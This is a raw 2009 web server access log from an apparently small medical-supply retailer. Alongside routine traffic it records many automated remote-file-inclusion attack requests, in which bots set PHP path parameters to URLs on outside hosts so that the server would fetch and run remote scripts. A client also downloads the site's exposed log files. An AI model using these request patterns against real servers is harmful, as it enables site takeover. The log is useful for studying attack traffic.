172.16.1.180 - - [24/Jun/2009:07:18:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:18:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [24/Jun/2009:07:18:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
155.212.232.66 - - [24/Jun/2009:07:18:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
155.212.232.66 - - [24/Jun/2009:07:18:46 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
155.212.232.66 - - [24/Jun/2009:07:18:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
155.212.232.66 - - [24/Jun/2009:07:18:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
210.4.77.148 - - [24/Jun/2009:07:18:57 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:07:19:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:19:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:19:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:19:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:19:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:19:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.4.77.148 - - [24/Jun/2009:07:20:03 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:07:20:16 -0400] "GET /logs/access_log.Q109061800%20%20//administrator/components/com_moofaq/css/errors.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:07:20:21 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_moofaq/css/errors.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:07:20:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:20:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:20:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.162.115.67 - - [24/Jun/2009:07:20:43 -0400] "GET /logs/access_log.Q109053000%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:20:47 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:20:57 -0400] "GET /index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:20:58 -0400] "GET /logs/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:20:58 -0400] "GET /logs/access_log.Q109053000/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:20:58 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:07:20:59 -0400] "GET /logs/access_log.Q109061800%20%20//administrator/components/com_moofaq/css/errors.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:07:20:59 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_moofaq/css/errors.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:21:00 -0400] "GET /logs/access_log.Q109053000/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:21:00 -0400] "GET /logs/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:21:00 -0400] "GET /index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:21:02 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.129.16.76 - - [24/Jun/2009:07:21:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.129.16.76 - - [24/Jun/2009:07:21:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.129.16.76 - - [24/Jun/2009:07:21:27 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.129.16.76 - - [24/Jun/2009:07:21:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.3.40.137 - - [24/Jun/2009:07:21:43 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:22:22 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 200 6784 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:22:22 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:22:22 -0400] "GET /logs/access_log.Q109050900///?_SERVER[DOCUMENT_ROOT]=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:07:22:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:22:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:22:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.217.216.86 - - [24/Jun/2009:07:22:52 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.217.216.86 - - [24/Jun/2009:07:22:52 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.217.216.86 - - [24/Jun/2009:07:22:52 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.217.216.86 - - [24/Jun/2009:07:22:53 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.162.115.67 - - [24/Jun/2009:07:22:56 -0400] "GET /logs/access_log.Q109053000%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:22:56 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:23:12 -0400] "GET /logs/error_log.Q109050900///?_SERVER[DOCUMENT_ROOT]=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:23:19 -0400] "GET /logs/access_log.Q109053000%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:23:19 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.233.11.27 - - [24/Jun/2009:07:23:27 -0400] "GET //poll/poll_ssi.php?include_path=http://www.votaya.com//pics/site/image?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.59.12.99 - - [24/Jun/2009:07:23:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.80 - - [24/Jun/2009:07:23:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:23:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:23:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.49 - - [24/Jun/2009:07:24:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0110614517035400A2D0013+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.162.115.67 - - [24/Jun/2009:07:25:16 -0400] "GET /logs/access_log.Q109053000%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.162.115.67 - - [24/Jun/2009:07:25:17 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.213.33.52 - - [24/Jun/2009:07:25:11 -0400] "GET http://www.aceonlinestore.com/logs/access_log.Q109060400 HTTP/1.0" 200 4467320 "http://search.yahoo.com/search?p=67.69.254.242:80+proxy+OR+proxies+OR+socks5+OR+http+OR+socks4+\"2009\"&adult_done=http%3A%2F%2Fyq.search.yahoo.com%2Fsearch&adult_cancel=http%3A%2F%2Fyq.search.yahoo.com%2Fweb%2Fadvanced&_adv_prop=web&ei=UTF-8&vst=0&vf=all&vm=i&fl=0&n=100&fr=yq-gen&_bcrumb=d88857c746a7a3da8fe6bbba455d2991%2C1240350925" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
98.213.33.52 - - [24/Jun/2009:07:25:16 -0400] "GET http://www.aceonlinestore.com/logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "http://search.yahoo.com/search?p=217.73.17.173:80+proxy+OR+proxies+OR+socks5+OR+http+OR+socks4+\"2009\"&adult_done=http%3A%2F%2Fyq.search.yahoo.com%2Fsearch&adult_cancel=http%3A%2F%2Fyq.search.yahoo.com%2Fweb%2Fadvanced&_adv_prop=web&ei=UTF-8&vst=0&vf=all&vm=i&fl=0&n=100&fr=yq-gen&_bcrumb=d88857c746a7a3da8fe6bbba455d2991%2C1240350925" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
193.132.159.169 - - [24/Jun/2009:07:27:18 -0400] "GET /images/ACE_EZ_PRP_sellsheet.pdf HTTP/1.0" 200 1064438 "http://www.google.co.uk/search?hl=en&q=platelet+rich+plasma+vacutainer&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.6.17.151 - - [24/Jun/2009:07:28:19 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [24/Jun/2009:07:28:19 -0400] "GET /logs/error_log.Q109032900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
63.223.104.57 - - [24/Jun/2009:07:28:40 -0400] "GET /logs/access_log.Q109051700//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:07:28:40 -0400] "GET //?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.810"
209.59.12.99 - - [24/Jun/2009:07:28:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.223.104.57 - - [24/Jun/2009:07:28:41 -0400] "GET /logs//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 200 6783 "-" "libwww-perl/5.810"
192.114.71.150 - - [24/Jun/2009:07:28:43 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
192.114.71.150 - - [24/Jun/2009:07:28:43 -0400] "GET //shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
192.114.71.150 - - [24/Jun/2009:07:29:02 -0400] "GET /logs//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
193.243.139.4 - - [24/Jun/2009:07:29:14 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:29:14 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:29:14 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:29:18 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:29:18 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:29:21 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
74.200.195.130 - - [24/Jun/2009:07:29:23 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:29:23 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:29:23 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:29:24 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:29:24 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:29:24 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
192.114.71.150 - - [24/Jun/2009:07:29:29 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
89.253.238.151 - - [24/Jun/2009:07:29:42 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
89.253.238.151 - - [24/Jun/2009:07:29:42 -0400] "GET //shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.253.238.151 - - [24/Jun/2009:07:29:52 -0400] "GET /logs//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
74.200.195.130 - - [24/Jun/2009:07:29:59 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:30:01 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.253.238.151 - - [24/Jun/2009:07:30:32 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://www.fcbarcelona.net.au/sendismnid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
83.16.182.130 - - [24/Jun/2009:07:30:32 -0400] "GET //skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:30:33 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:30:33 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:30:33 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:30:33 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:30:33 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:35 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:35 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:35 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:37 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:44 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:45 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:45 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:46 -0400] "GET /logs/access_log.Q109051500%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:47 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:47 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:47 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:48 -0400] "GET /logs/access_log.Q109060400%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:52 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:30:53 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:30:55 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:30:55 -0400] "GET /logs/access_log.Q109052500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:30:55 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:30:55 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:30:56 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:30:56 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:30:56 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:09 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:09 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:11 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
